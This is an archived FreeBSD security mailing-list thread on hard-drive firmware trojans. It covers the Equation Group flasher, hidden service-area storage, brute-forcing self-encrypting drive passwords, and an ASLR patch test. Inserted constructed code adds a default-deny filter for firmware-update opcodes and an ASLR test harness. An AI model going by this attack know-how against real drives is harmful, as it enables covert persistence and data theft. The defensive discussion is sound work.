From owner-freebsd-security@FreeBSD.ORG Sun Feb 22 10:44:27 2015
From: grarpamp
To: freebsd-security@freebsd.org
Cc: freebsd-questions@freebsd.org
Date: Sun, 22 Feb 2015 05:44:26 -0500
Subject: trojans in the firmware
On Sat, Feb 21, 2015 at 8:41 AM, Kay Rydyger :

Please do not quote 200 lines of text just to insert your ten. And if using the digest, use the original subject line. Else it's lazy bad form at the expense of other readers of the list.

>> > Alfred Hegemeier saith:
>> > just encrypt the whole hard drive with Geli.
>>
>> GELI works under your control for what you store on the
>> drive, and you can even enable the AES encryption feature
>> of the drive itself as a no cost to performance extra freebie
>> underneath that. However since the raw device interface is still
>> accessible, neither of them do anything to block firmware
>> updates.

> what has blocking firmware updates to do with
> firmware being able to read the data passing
> through the controller ?

Reread the entire thread and all the linked materials. If your drive is clean and your kernel blocks the malicious firmware update command, the exploit fails and your drive remains clean. If you don't block it, then your drive gets rooted and then yes, there's nothing you can do after that. And since users don't have JTAG gear/skills and device vendors usually never publish a firmware update anyway, you can't verify or securely reflash even if you did discover it got rooted. Thus you now own a worthless brick with a warranty that won't be honored.

> That encryption is a good line of defense, you can
> read here:
> https://www.ibr.cs.tu-bs.de/users/kurmus/papers/acsac13.pdf
> in section 4.1.

No, hardware and software disk encryption themselves don't prevent installation of the firmware, nor help much afterwards given the current as yet non-ideal state of the entire system protection/crypto ecosystem. The MBR, boot, loader and whatever other early stages are not encrypted or signed... malicious firmware can exploit that. It could also use DMA to read/write RAM to get your FDE keys and so on. Even SecureBoot with FDE doesn't help there. It's all caveated in the doc.

To be more secure you need to disallow the malicious firmware update from taking place to begin with. The standard interface for that is through the /dev device provided by the disk driver over the bus subsystem. Block/filter out all non-production opcodes from those interfaces and it becomes more work for kids to exploit. Add that to other defenses in depth and you're better off.

Long term, you should demand the vendors include a $0.10 hardware read-only update jumper and a signed authority root anchored in the mask ROM. You should demand the t10/t11/t13/serialata standards bodies include a readout command for firmware verification and backup. For that matter, you should demand vendors include another jumper for pointing to your own installable ROM space in flash (or via pin header) and to also open up their specs so you don't have to use their literally stupid and broken firmware blobs [1].

How many tens of thousands of users strong are you BSD? How many tens of thousands of users strong is Linux? Yet all of you combined can't seem to place even two calls/mails per month to each vendor asking for these things... shame. You can and should be overloading their switchboards... they'd drop to their knees before your armies in a week.

[1] Vendor code is generally buggy crap quality, quite often highly guarded just to save embarrassment there, to dodge responsibility for making fixes by saying "what bugs, where", and to speed up obsolescence.
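A user-space model of the default-deny opcode filter proposed above for the kernel's raw-device path, added here as an illustration (it is not code from the thread or from FreeBSD). It assumes raw commands reach the disk as SCSI ATA PASS-THROUGH CDBs, as on the CAM pass(4) path, and the vendor-specific opcode ranges it names are an assumption for the log message only.

```python
"""Default-deny ATA opcode filter for the raw pass-through path (user-space model).

Constructed example. On FreeBSD (CAM) and Linux a SATA disk is reached
from user space with a SCSI ATA PASS-THROUGH CDB (0xA1, 12 bytes, or
0x85, 16 bytes) that wraps the ATA register set; the ATA COMMAND byte sits
at CDB byte 9 or byte 14 respectively. Only production I/O opcodes are
allowed; DOWNLOAD MICROCODE and vendor-specific opcodes are denied and logged.
"""
from dataclasses import dataclass
from typing import List, Optional

SCSI_ATA_PASSTHROUGH_12 = 0xA1
SCSI_ATA_PASSTHROUGH_16 = 0x85
SCSI_WRITE_BUFFER = 0x3B          # firmware download path for SCSI/SAS disks

ATA_DOWNLOAD_MICROCODE = 0x92
ATA_DOWNLOAD_MICROCODE_DMA = 0x93

# Production opcodes a normal storage stack needs (ACS opcode values).
ALLOWED_OPCODES = {
    0x20: "READ SECTOR(S)", 0x24: "READ SECTOR(S) EXT",
    0x25: "READ DMA EXT", 0x30: "WRITE SECTOR(S)",
    0x34: "WRITE SECTOR(S) EXT", 0x35: "WRITE DMA EXT",
    0x60: "READ FPDMA QUEUED", 0x61: "WRITE FPDMA QUEUED",
    0xB0: "SMART", 0xC8: "READ DMA", 0xCA: "WRITE DMA",
    0xE5: "CHECK POWER MODE", 0xE7: "FLUSH CACHE",
    0xEA: "FLUSH CACHE EXT", 0xEC: "IDENTIFY DEVICE",
    0xEF: "SET FEATURES",
}

# Vendor-specific ranges (assumed from the ACS opcode table; used only to
# label the denial, since default-deny does not depend on them being exact).
VENDOR_SPECIFIC_RANGES = ((0x80, 0x86), (0x88, 0x8F), (0xC1, 0xC3), (0xF0, 0xFF))


@dataclass
class Verdict:
    allowed: bool
    opcode: Optional[int]     # ATA COMMAND byte, None if not an ATA pass-through
    reason: str


def is_vendor_specific(opcode: int) -> bool:
    return any(lo <= opcode <= hi for lo, hi in VENDOR_SPECIFIC_RANGES)


def ata_opcode_from_cdb(cdb: bytes) -> Optional[int]:
    """Return the ATA COMMAND byte wrapped by an ATA PASS-THROUGH CDB, else None."""
    if len(cdb) == 12 and cdb[0] == SCSI_ATA_PASSTHROUGH_12:
        return cdb[9]
    if len(cdb) == 16 and cdb[0] == SCSI_ATA_PASSTHROUGH_16:
        return cdb[14]
    return None


def filter_cdb(cdb: bytes, log: Optional[List[str]] = None) -> Verdict:
    """Apply the policy to one CDB; every denial is appended to `log`."""
    if not cdb:
        verdict = Verdict(False, None, "empty CDB")
    elif cdb[0] == SCSI_WRITE_BUFFER:
        # All WRITE BUFFER firmware download modes ride on this opcode and a
        # production host never needs it, so deny it outright.
        verdict = Verdict(False, None, "SCSI WRITE BUFFER (firmware download path)")
    else:
        opcode = ata_opcode_from_cdb(cdb)
        if opcode is None:
            # Ordinary SCSI READ/WRITE from the disk driver: outside this policy.
            verdict = Verdict(True, None, "not an ATA pass-through CDB")
        elif opcode in ALLOWED_OPCODES:
            verdict = Verdict(True, opcode, ALLOWED_OPCODES[opcode])
        elif opcode in (ATA_DOWNLOAD_MICROCODE, ATA_DOWNLOAD_MICROCODE_DMA):
            verdict = Verdict(False, opcode, "firmware update (DOWNLOAD MICROCODE)")
        elif is_vendor_specific(opcode):
            verdict = Verdict(False, opcode, "vendor-specific opcode")
        else:
            verdict = Verdict(False, opcode, "not on the production allow-list")
    if not verdict.allowed and log is not None:
        head = f"0x{cdb[0]:02X}" if cdb else "none"
        op = "n/a" if verdict.opcode is None else f"0x{verdict.opcode:02X}"
        log.append(f"DENY cdb={head} ata_opcode={op}: {verdict.reason}")
    return verdict


def build_passthrough16(ata_cmd: int, features: int = 0, count: int = 0, lba: int = 0) -> bytes:
    """Constructed 16-byte ATA PASS-THROUGH CDB (protocol/flags left zero)."""
    cdb = bytearray(16)
    cdb[0] = SCSI_ATA_PASSTHROUGH_16
    cdb[3], cdb[4] = (features >> 8) & 0xFF, features & 0xFF
    cdb[5], cdb[6] = (count >> 8) & 0xFF, count & 0xFF
    # 48-bit LBA: bytes 7..12 carry (previous, current) pairs of low/mid/high.
    cdb[8], cdb[10], cdb[12] = lba & 0xFF, (lba >> 8) & 0xFF, (lba >> 16) & 0xFF
    cdb[7], cdb[9], cdb[11] = (lba >> 24) & 0xFF, (lba >> 32) & 0xFF, (lba >> 40) & 0xFF
    cdb[14] = ata_cmd
    return bytes(cdb)


def build_passthrough12(ata_cmd: int, features: int = 0, count: int = 0) -> bytes:
    """Constructed 12-byte ATA PASS-THROUGH CDB (28-bit form)."""
    cdb = bytearray(12)
    cdb[0] = SCSI_ATA_PASSTHROUGH_12
    cdb[3], cdb[4], cdb[9] = features & 0xFF, count & 0xFF, ata_cmd
    return bytes(cdb)


if __name__ == "__main__":
    log: List[str] = []
    samples = [
        ("READ DMA EXT via pass-through(16)", build_passthrough16(0x25, count=8, lba=2048)),
        ("DOWNLOAD MICROCODE via pass-through(16)", build_passthrough16(0x92)),
        ("vendor-specific opcode via pass-through(12)", build_passthrough12(0x80)),
        ("plain SCSI READ(10) from the disk driver", bytes([0x28] + [0] * 9)),
    ]
    for label, cdb in samples:
        v = filter_cdb(cdb, log)
        print(f"{'ALLOW' if v.allowed else 'DENY ':5} {label}: {v.reason}")
    print("\n".join(log))
```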
From owner-freebsd-security@FreeBSD.ORG Sun Feb 22 23:48:00 2015
From: Peter Gutmann
To: cryptography@metzdowd.com, cypherpunks@cpunks.org, freebsd-security@freebsd.org, grarpamp@gmail.com, hbaker1@pipeline.com
Date: Mon, 23 Feb 2015 12:45:02 +1300
Subject: Re: [Cryptography] trojans in the firmware

Henry Baker writes:

>BTW, what's the point of AES encryption on this pre-p0wned device? More
>security theatre?

Almost. Its sole use is for very fast "drive erasure", i.e. you change the key and the data on it becomes inaccessible. Have a look at this presentation:

http://www.snia.org/sites/default/education/tutorials/2012/spring/security/MichaelWillett_Implementing%20Stored-Data_Encryption_2.pdf

which describes what Samsung (and others) are doing, in particular slide 18. The decryption key (DEK) is stored in the drive, and is unlocked using a password (and "authentication key", AK). So to decrypt the drive you extract the encrypted DEK, brute-force the password (AK), and you're in.

In any case though it doesn't protect against an attack that occurs when the drive is mounted since it looks like an unencrypted drive at that point (and presumably the AK is hardcoded into a startup script or something similar in order to survive power outages, so you can grab that if you really need it).

It's actually hard to see what purpose this "encryption" is serving (the vendors studiously avoid providing a threat model), it doesn't protect live data, it barely protects data at rest (say if you decide to Fedex the contents of your data centre across town), the only thing it really does is allow for fast erasure of contents, and protect against casual snooping of the "buy a batch of drives on ebay and see what's on them" kind. So I guess if ebay is your threat, it's good enough. OTOH a BIOS password set for the drive will do the same thing.

As a more general response to "what's the point", regulatory compliance ("our drives were encrypted so we don't have to disclose the 40M credit card breach from last week"), buzzword-compliance, CYA, it's not a bad idea from a marketing point of view.

Peter.
From owner-freebsd-security@FreeBSD.ORG Mon Feb 23 04:54:41 2015
From: Tom Mitchell
To: Peter Gutmann
Cc: cpunks, freebsd-security@freebsd.org, "cryptography@metzdowd.com", grarpamp, Henry Baker
Date: Sun, 22 Feb 2015 20:48:15 -0800
Subject: Re: [Cryptography] trojans in the firmware

On Sun, Feb 22, 2015 at 3:45 PM, Peter Gutmann wrote:

> Henry Baker writes:
>
> >BTW, what's the point of AES encryption on this pre-p0wned device? More
> >security theatre?
>
> Almost. Its sole use is for very fast "drive erasure", i.e. you change the
> key and the data on it becomes inaccessible. Have a look
>

Yes... In addition it can be of value for a remote wipe. This is interesting with phone home software that then discovers it has been reported lost. A small handshake and one company might duck having to report a massive data breach.

The single largest value is the release of devices that once lived in an interesting location and need to be transported to a destruction location. Perhaps not national secrets but Amazon or Google compute center.. or pharma... or medical records.

More valuable to RAID vendors than customers of RAID vendors as it can be used to limit vendor liability as they replace one rack with a new one and have to manage the trash.

Someone once commented to me that NSA and TLAs like milling machines and the curie point of media. All must transport the device to be trashed. Some individuals in the early steps of the custody chain might like a quick wipe method.

Some should mention the terrible handling of disks in copy machines. This could help in the decommission or service process but does not solve bankruptcy induced problems.
-- T o m M i t c h e l l

From owner-freebsd-security@FreeBSD.ORG Mon Feb 23 23:10:00 2015
From: grarpamp
To: cypherpunks@cpunks.org
Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
Date: Mon, 23 Feb 2015 18:09:59 -0500
Subject: Fwd: [Cryptography] trojans in the firmware
References: <54E2B04C.9080707@av8n.com> <54E436FB.9000709@deadhat.com> <711B69EB-1CBF-4F03-9336-AFEBE0B857A0@callas.org>

> http://www.recover.co.il/SA-cover/SA-cover.pdf

Since the firmware rules over everything, all the spare sectors for block reallocation must be considered too, not just the service areas. Then there is the per sector CRC space that could perhaps be reutilized if CRC is implemented as software function. Kernel options to permit only your approved list of opcodes and block all else by default would seem useful to have.

> http://www.spiegel.de/media/media-35661.pdf

Again, look at the list of Unix operating systems and file systems. These guys are calling Unix out by name, and soon the common script kid will be too. Unix is under attack and this stuff can't be ignored as "too rare and/or hard and/or low market share to be relevant" anymore.

---------- Forwarded message ----------
Date: Mon, Feb 23, 2015 at 12:10 PM
Subject: Re: [Cryptography] trojans in the firmware

FYI -- CMU has been hacking disk drive firmware since the 1990's for "smart disks" and "performance"; UCSD has been hacking flash drive firmware more recently. I believe that DARPA has also openly solicited for disk drive/flash drive firmware hacking capabilities. Both CMU & UCSD are hotbeds of NSA recruitment activity.

We now know that in NSA parlance "smart" anything = "spying" anything; e.g., "smart disks" = "spying disks"; "smart phones" = "spying phones", etc.

BTW, hiding stuff in a flash memory stick is even easier than in a hard drive. This is because flash memory is so unreliable, that there is typically a huge percentage of unused space; the cheaper the flash memory, the smaller the fraction of usable reliable memory space.

So it wouldn't be at all surprising to find that your 32GB flash drive is really constructed from 64GB chips, and that 50% of the device is unavailable for use. It is highly unlikely that _all_ of this unused space is unreliable, so this leaves plenty of room for NSA lurking. But even if the device were 100% reliable, noticing that only 50% was actually in use would be unremarkable, given the typical degree of unreliability of these types of devices.

For these reasons, it is critical for flash memory devices to _open up_ their API's, so that the raw memory (with all of its warts) can be inspected and verified.

http://www.wired.com/2015/02/nsa-firmware-hacking/

How the NSA's Firmware Hacking Works and Why It's So Unsettling
By Kim Zetter
02.22.15 8:09 pm

One of the most shocking parts of the recently discovered spying network Equation Group is its mysterious module designed to reprogram or reflash a computer hard drive's firmware with malicious code. The Kaspersky researchers who uncovered this said its ability to subvert hard drive firmware—the guts of any computer—"surpasses anything else" they had ever seen.

The hacking tool, believed to be a product of the NSA, is significant because subverting the firmware gives the attackers God-like control of the system in a way that is stealthy and persistent even through software updates. The module, named "nls_933w.dll", is the first of its kind found in the wild and is used with both the EquationDrug and GrayFish spy platforms Kaspersky uncovered.

It also has another capability: to create invisible storage space on the hard drive to hide data stolen from the system so the attackers can retrieve it later. This lets spies like the Equation Group bypass disk encryption by secreting documents they want to seize in areas that don't get encrypted.

Kaspersky has so far uncovered 500 victims of the Equation Group, but only five of these had the firmware-flashing module on their systems. The flasher module is likely reserved for significant systems that present special surveillance challenges. Costin Raiu, director of Kaspersky's Global Research and Analysis Team, believes these are high-value computers that are not connected to the internet and are protected with disk encryption.

Here's what we know about the firmware-flashing module.

How It Works

Hard drive disks have a controller, essentially a mini-computer, that includes a memory chip or flash ROM where the firmware code for operating the hard drive resides.

When a machine is infected with EquationDrug or GrayFish, the firmware flasher module gets deposited onto the system and reaches out to a command server to obtain payload code that it then flashes to the firmware, replacing the existing firmware with a malicious one. The researchers uncovered two versions of the flasher module: one that appears to have been compiled in 2010 and is used with EquationDrug and one with a 2013 compilation date that is used with GrayFish.

The Trojanized firmware lets attackers stay on the system even through software updates. If a victim, thinking his or her computer is infected, wipes the computer's operating system and reinstalls it to eliminate any malicious code, the malicious firmware code remains untouched. It can then reach out to the command server to restore all of the other malicious components that got wiped from the system.

Even if the firmware itself is updated with a new vendor release, the malicious firmware code may still persist because some firmware updates replace only parts of the firmware, meaning the malicious portions may not get overwritten with the update. The only solution for victims is to trash their hard drive and start over with a new one.

The attack works because firmware was never designed with security in mind. Hard disk makers don't cryptographically sign the firmware they install on drives the way software vendors do. Nor do hard drive disk designs have authentication built in to check for signed firmware. This makes it possible for someone to change the firmware. And firmware is the perfect place to conceal malware because antivirus scanners don't examine it. There's also no easy way for users to read the firmware and manually check if it's been altered.

The firmware flasher module can reprogram the firmware of more than a dozen different hard drive brands, including IBM, Seagate, Western Digital, and Toshiba.

"You know how much effort it takes to land just one firmware for a hard drive? You need to know specifications, the CPU, the architecture of the firmware, how it works," Raiu says. The Kaspersky researchers have called it "an astonishing technical accomplishment and is testament to the group's abilities."

Once the firmware is replaced with the Trojanized version, the flasher module creates an API that can communicate with other malicious modules on the system and also access hidden sectors of the disk where the attackers want to conceal data they intend to steal. They hide this data in the so-called service area of the hard drive disk where the hard disk stores data needed for its internal operation.

Hidden Storage Is the Holy Grail

The revelation that the firmware hack helps store data the attackers want to steal didn't get much play when the story broke last week, but it's the most significant part of the hack. It also raises a number of questions about how exactly the attackers are pulling this off. Without an actual copy of the firmware payload that gets flashed to infected systems, there's still a lot that's unknown about the attack, but some of it can be surmised.

The ROM chip that contains the firmware includes a small amount of storage that goes unused. If the ROM chip is 2 megabytes, the firmware might take up just 1.5 megabytes, leaving half a megabyte of unused space that can be employed for hiding data the attackers want to steal.

This is particularly useful if the computer has disk encryption enabled. Because the EquationDrug and GrayFish malware run in Windows, they can grab a copy of documents while they're unencrypted and save them to this hidden area on the machine that doesn't get encrypted. There isn't much space on the chip for a lot of data or documents, however, so the attackers can also just store something equally as valuable to bypass encryption.

"Taking into account the fact that their GrayFish implant is active from the very boot of the system, they have the ability to capture the encryption password and save it into this hidden area," Raiu says.

Authorities could later grab the computer, perhaps through border interdiction or something the NSA calls "customs opportunities," and extract the password from this hidden area to unlock the encrypted disk.

http://cryptome.org/2014/05/nsa-customs.htm

Raiu thinks the intended targets of such a scheme are limited to machines that are not connected to the internet and have encrypted hard drives. One of the five machines they found hit with the firmware flasher module had no internet connection and was used for special secure communications.

"[The owners] only use it in some very specific cases where there is no other way around it," Raiu says. "Think about Bin Laden who lived in the desert in an isolated compound—doesn't have internet and no electronic footprint. So if you want information from his computer how do you get it? You get documents into the hidden area and you wait, and then after one or two years you come back and steal it. The benefits [of using this] are very specific."

Raiu thinks, however, that the attackers have a grander scheme in mind. "In the future probably they want to take it to the next level where they just copy all the documents [into the hidden area] instead of the password. [Then] at some point, when they have an opportunity to have physical access to the system, they can then access that hidden area and get the unencrypted docs."

They wouldn't need the password if they could copy an entire directory from the operating system to the hidden sector for accessing later. But the flash chip where the firmware resides is too small for large amounts of data. So the attackers would need a bigger hidden space for storage. Luckily for them, it exists.

There are large sectors in the service area of the hard drive disk that are also unused and could be commandeered to store a large cache of documents, even ones that might have been deleted from other parts of the computer. This service area, also called the reserved area or system area, stores the firmware and other data needed to operate drives, but it also contains large portions of unused space.

An interesting paper (.pdf) published in February 2013 by Ariel Berkman, a data recovery specialist at the Israeli firm Recover, noted "not only that these areas can't be sanitized (via standard tools), they cannot be accessed via anti-virus software [or] computer forensics tools."

http://www.recover.co.il/SA-cover/SA-cover.pdf

Berkman points out that one particular model of Western Digital drives has 141 MB reserved for the service area, but only uses 12 MB of this, leaving the rest free for stealth storage.

To write or copy data to service area requires special commands that are specific to each vendor and are not publicly documented, so an attacker would need to uncover what these are. But once they do, "[b]y sending Vendor Specific Commands (VSCs) directly to the hard-drive, one can manipulate these [service] areas to read and write data that are otherwise inaccessible," Berkman writes.

It is also possible, though not trivial, to write a program to automatically copy documents to this area. Berkman himself wrote a proof-of-concept program to read and write a file of up to 94 MB to the service area, but the program was a bit unstable and he noted that it could cause some data loss or cause the hard drive to fail.

One problem with hiding large amounts of data like this, however, is that its presence might be detected by examining the size of the used space in the service area. If there should be 129 MB of unused space in this sector but there's only 80 MB, it's a dead giveaway that something is there that shouldn't be. But a leaked NSA document that was written in 2006 but was published by Der Spiegel last month suggests the spy agency might have resolved this particular problem.

NSA Interns to the Rescue

The document (.pdf) is essentially a wish list of future spy capabilities the NSA hoped to develop for its so-called Persistence Division, a division that has an attack team within it that focuses on establishing and maintaining persistence on compromised machines by subverting their firmware, BIOS, BUS or drivers. The document lists a number of projects the NSA put together for interns to tackle on behalf of this attack team. Among them is the "Covert Storage" project for developing a hard drive firmware implant that can prevent covert storage on disks from being detected. To do this, the implant prevents the system from disclosing the true amount of free space available on the disk.

http://www.spiegel.de/media/media-35661.pdf

"The idea would be to modify the firmware of a particular hard drive so that it normally only recognizes, say, half of its available space," the document reads. "It would report this size back to the operating system and not provide any way to access the additional space." Only one partition of the drive would be visible on the partition table, leaving the other partitions—where the hidden data was stored—invisible and inaccessible.

The modified firmware would have a special hook embedded in it that would unlock this hidden storage space only after a custom command was sent to the drive and the computer was rebooted. The hidden partition would then be available on the partition table and accessible until the secret storage was locked again with another custom command.

How exactly the spy agency planned to retrieve the hidden data was unclear from the eight-year-old document. Also unclear is whether the interns ever produced a firmware implant that accomplished what the NSA sought. But given that the document includes a note that interns would be expected to produce a solution for their project within six months after assignment, and considering the proven ingenuity of the NSA in other matters, they no doubt figured it out.
From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:09:46 2015
From: RW
To: freebsd-security@freebsd.org
Date: Tue, 24 Feb 2015 13:09:41 +0000
Subject: Re: [Cryptography] trojans in the firmware
Message-ID: <20150224130941.5b0998bc@gumby.homeunix.com>

On Mon, 23 Feb 2015 12:45:02 +1300 Peter Gutmann wrote:

> Henry Baker writes:
>
> >BTW, what's the point of AES encryption on this pre-p0wned device?
> >More security theatre?
>
> Almost. Its sole use is for very fast "drive erasure", i.e. you
> change the key and the data on it becomes inaccessible. Have a look
> at this presentation:
>
> http://www.snia.org/sites/default/education/tutorials/2012/spring/security/MichaelWillett_Implementing%20Stored-Data_Encryption_2.pdf
>
> which describes what Samsung (and others) are doing, in particular
> slide 18. The decryption key (DEK) is stored in the drive, and is
> unlocked using a password (and "authentication key", AK). So to
> decrypt the drive you extract the encrypted DEK, brute-force the
> password (AK), and you're in.

This is how practically all disk encryption works. Whether or not it's secure depends on the strength of the password + key-file.
From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:30:21 2015
Date: Tue, 24 Feb 2015 13:30:19 +0000
From: Bartek Rutkowski
To: Shawn Webb
Cc: freebsd-security@freebsd.org
Subject: Re: CFT: New ASLR Patch
In-Reply-To: <2473923.nPpcAzaekg@shawnwebb-laptop>
On Sat, Feb 21, 2015 at 3:59 PM, Shawn Webb wrote:
> Hey All,
>
> It has been a long time since we sent out a call for testing request for our
> ASLR patch. We've been hard at work making our ASLR implementation as robust
> as possible. We'd like to invite all adventurous souls to test our ASLR
> implementation. Put it through the ringer.
>
> Since the patch is much too large to attach to an email, you can find our
> latest patch on FreeBSD's Phabricator:
>
> https://reviews.freebsd.org/D473
>
> Or download the raw version of the patch:
> https://reviews.freebsd.org/D473?download=true
>
> Please let me know if you find any issues.
>
> Thanks,
>
> Shawn Webb
> HardenedBSD

Hi,

First of all, thanks a lot for your work on that, can't wait to see it
implemented in a FreeBSD release!

Could you perhaps update your call for testing with some instructions for
potential testers as to how to test (I assume this patch is against
-CURRENT, but I could be wrong here, and others could make different
assumptions), is there anything other than applying patches, compilation
and reboot required (any configuration?), what to look at when running on
these patches, what are you interested in when reporting any
success/issues with them (any instructions for generating a relevant
problem report for you?) and so on?
Kind regards,
Bartek Rutkowski

From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 13:37:52 2015
From: Shawn Webb
To: Bartek Rutkowski
Cc: freebsd-security@freebsd.org
Subject: Re: CFT: New ASLR Patch
Date: Tue, 24 Feb 2015 08:37:39 -0500
Organization: HardenedBSD

On Tuesday, February 24, 2015 01:30:19 PM Bartek Rutkowski wrote:
> On Sat, Feb 21, 2015 at 3:59 PM, Shawn Webb wrote:
> > Hey All,
> >
> > It has been a long time since we sent out a call for testing request for
> > our ASLR patch. We've been hard at work making our ASLR implementation as
> > robust as possible. We'd like to invite all adventurous souls to test our
> > ASLR implementation. Put it through the ringer.
> >
> > Since the patch is much too large to attach to an email, you can find our
> > latest patch on FreeBSD's Phabricator:
> >
> > https://reviews.freebsd.org/D473
> >
> > Or download the raw version of the patch:
> > https://reviews.freebsd.org/D473?download=true
> >
> > Please let me know if you find any issues.
> >
> > Thanks,
> >
> > Shawn Webb
> > HardenedBSD
>
> Hi,
>
> First of all, thanks a lot for your work on that, can't wait to see it
> implemented in a FreeBSD release!
>
> Could you perhaps update your call for testing with some instructions
> for potential testers as to how to test (I assume this patch is against
> -CURRENT, but I could be wrong here, and others could make different
> assumptions), is there anything other than applying patches,
> compilation and reboot required (any configuration?), what to look at
> when running on these patches, what are you interested in when
> reporting any success/issues with them (any instructions for
> generating a relevant problem report for you?) and so on?
>
> Kind regards,
> Bartek Rutkowski

Hey Bartek,

Great questions which I should have answered in my original email. The
patch is against HEAD (11-CURRENT). Here's how you can test it:

1) Download the patch
2) cd /usr/src && patch -p1 < /path/to/downloaded/patch
3) vim sys/amd64/conf/GENERIC
3.1) Find the line that has "#options PAX_ASLR" and uncomment it
3.2) Optionally uncomment the PAX_SYSCTLS kernel option as well
4) Build world and kernel
5) Install world and kernel
6) Reboot
7) Sit back, relax, and enjoy life

Since FreeBSD's base doesn't support being compiled as
Position-Independent Executables (PIEs), ASLR is only semi-applied. The
base addresses of shared objects and anonymous mappings get randomized
along with the stack. The base address of the executable itself does
not. If FreeBSD had support for compiling base as PIEs, then you would
see ASLR fully applied, including the base address of the application.

Ideally, you should see no breakage in applications. Our implementation
does provide per-jail granularity. So if an application does break with
ASLR applied, you can simply run that application in a jail where ASLR
is disabled for that jail only. You will need the PAX_SYSCTLS kernel
option in this case.

Thanks,

Shawn
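For the "what to look at" part of the question, an added example (written for this page, not part of the CFT thread or the HardenedBSD patch): a small harness that runs an address-printing test program several times, pulls labelled addresses out of its output and reports which ones moved. Against the patch as described above, the stack, shared-library and anonymous-mapping bases should move between runs while a non-PIE executable's base stays put; `check_against` compares an observed report with exactly that expectation. Assumptions, all mine: the test program prints lines of the form `label: 0x<hex>`, the labels are exe/stack/anon/libc, and the sample outputs in the block are constructed rather than captured from a real system.

```python
"""ASLR run-to-run comparison harness (added example, assumptions noted inline)."""
import re
import subprocess

# Expected line shape from the (hypothetical) test program: "label: 0x<hex>".
ADDR_LINE = re.compile(r"^\s*([A-Za-z_][\w.-]*)\s*:\s*0x([0-9a-fA-F]+)\s*$", re.MULTILINE)

# What the thread says to expect for a base built without PIE support.
NON_PIE_EXPECTATION = {
    "exe": "fixed",          # executable base is not randomized without PIE
    "stack": "randomized",
    "anon": "randomized",    # anonymous mappings (mmap/malloc arenas)
    "libc": "randomized",    # shared object base
}


def parse_addresses(output):
    """'label: 0x...' lines -> {label: int}."""
    return {m.group(1): int(m.group(2), 16) for m in ADDR_LINE.finditer(output)}


def classify(runs):
    """Per label: 'randomized' if its value differed in any run, 'fixed' if it
    never did, 'missing' if some run did not report it. Use enough runs (5 or
    more) that a coincidental repeat of a randomized base is not read as 'fixed'."""
    parsed = [parse_addresses(r) for r in runs]
    labels = set().union(*parsed) if parsed else set()
    report = {}
    for label in sorted(labels):
        values = [p.get(label) for p in parsed]
        if any(v is None for v in values):
            report[label] = "missing"
        elif len(set(values)) > 1:
            report[label] = "randomized"
        else:
            report[label] = "fixed"
    return report


def check_against(report, expectation=NON_PIE_EXPECTATION):
    """Labels whose observed behaviour differs from the expectation; an empty
    list means the build behaves as the thread describes."""
    return [
        f"{label}: expected {want}, observed {report.get(label, 'missing')}"
        for label, want in expectation.items()
        if report.get(label, "missing") != want
    ]


def sample_runs(cmd, count=5):
    """Run the test program `count` times and collect its stdout."""
    return [subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
            for _ in range(count)]


# Constructed sample output of a hypothetical address-printing program, three runs.
SAMPLE_RUNS = [
    "exe: 0x400000\nstack: 0x7fffffffe4a0\nanon: 0x800a2b000\nlibc: 0x800c3f000\n",
    "exe: 0x400000\nstack: 0x7fffdc1f09b0\nanon: 0x80b3e7000\nlibc: 0x80f902000\n",
    "exe: 0x400000\nstack: 0x7fff9a44d310\nanon: 0x80341c000\nlibc: 0x80a77b000\n",
]


if __name__ == "__main__":
    report = classify(SAMPLE_RUNS)
    for label, kind in report.items():
        print(f"{label:6s} {kind}")
    print("problems:", check_against(report) or "none")
```

On a real build, replace `SAMPLE_RUNS` with `sample_runs(["./addrtest"])`, where `addrtest` is any small program that prints the address of `main`, of a local variable, of a fresh `mmap` page and of a libc function under those four labels. If `exe` shows up as randomized, the binary was linked as PIE; if `stack` or `libc` shows up as fixed, the kernel option did not take effect.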
From owner-freebsd-security@FreeBSD.ORG Tue Feb 24 15:52:26 2015
Date: Tue, 24 Feb 2015 15:48:49 +0000 (UTC)
From: Kay Rydyger
To: freebsd-security@freebsd.org
Subject: Re: freebsd-security Digest, Vol 523, Issue 2

From: freebsd-security-request@freebsd.org
To: freebsd-security@freebsd.org
Sent: Tuesday, 24 February 2015, 13:00
Subject: freebsd-security Digest, Vol 523, Issue 2

Today's Topics:

   1. Re: [Cryptography] trojans in the firmware (Tom Mitchell)
   2. Fwd: [Cryptography] trojans in the firmware (grarpamp)

----------------------------------------------------------------------

Message: 1
Date: Sun, 22 Feb 2015 20:48:15 -0800
From: Tom Mitchell
To: Peter Gutmann
Cc: cpunks, freebsd-security@freebsd.org, cryptography@metzdowd.com, grarpamp, Henry Baker
Subject: Re: [Cryptography] trojans in the firmware
Content-Type: text/plain; charset=UTF-8

On Sun, Feb 22, 2015 at 3:45 PM, Peter Gutmann wrote:

> Henry Baker writes:
>
> >BTW, what's the point of AES encryption on this pre-p0wned device? More
> >security theatre?
>
> Almost. Its sole use is for very fast "drive erasure", i.e. you change the
> key and the data on it becomes inaccessible. Have a look
>

Yes... In addition it can be of value for a remote wipe. This is
interesting with phone home software that then discovers it has been
reported lost. A small handshake and one company might duck having to
report a massive data breach.

The single largest value is the release of devices that once lived in an
interesting location and need to be transported to a destruction
location. Perhaps not national secrets but Amazon or Google compute
center.. or pharma... or medical records. More valuable to RAID vendors
than customers of RAID vendors as it can be used to limit vendor
liability as they replace one rack with a new one and have to manage the
trash.

Someone once commented to me that NSA and TLAs like milling machines and
the curie point of media. All must transport the device to be trashed.
Some individuals in the early steps of the custody chain might like a
quick wipe method.

Some should mention the terrible handling of disks in copy machines.
This could help in the decommission or service process but does not
solve bankruptcy induced problems.

--
  T o m    M i t c h e l l

------------------------------

Message: 2
Date: Mon, 23 Feb 2015 18:09:59 -0500
From: grarpamp
To: cypherpunks@cpunks.org
Cc: freebsd-security@freebsd.org, freebsd-questions@freebsd.org
Subject: Fwd: [Cryptography] trojans in the firmware
Content-Type: text/plain; charset=UTF-8

> http://www.recover.co.il/SA-cover/SA-cover.pdf

Since the firmware rules over everything, all the spare sectors for
block reallocation must be considered too, not just the service areas.
Then there is the per sector CRC space that could perhaps be reutilized
if CRC is implemented as software function.

sorry, do not understand. What? The question was, how to protect against
"spies" in the hard drive controller, reading user data on the hard disk.
The answer is, and I am not citing spiegel online here for good reason
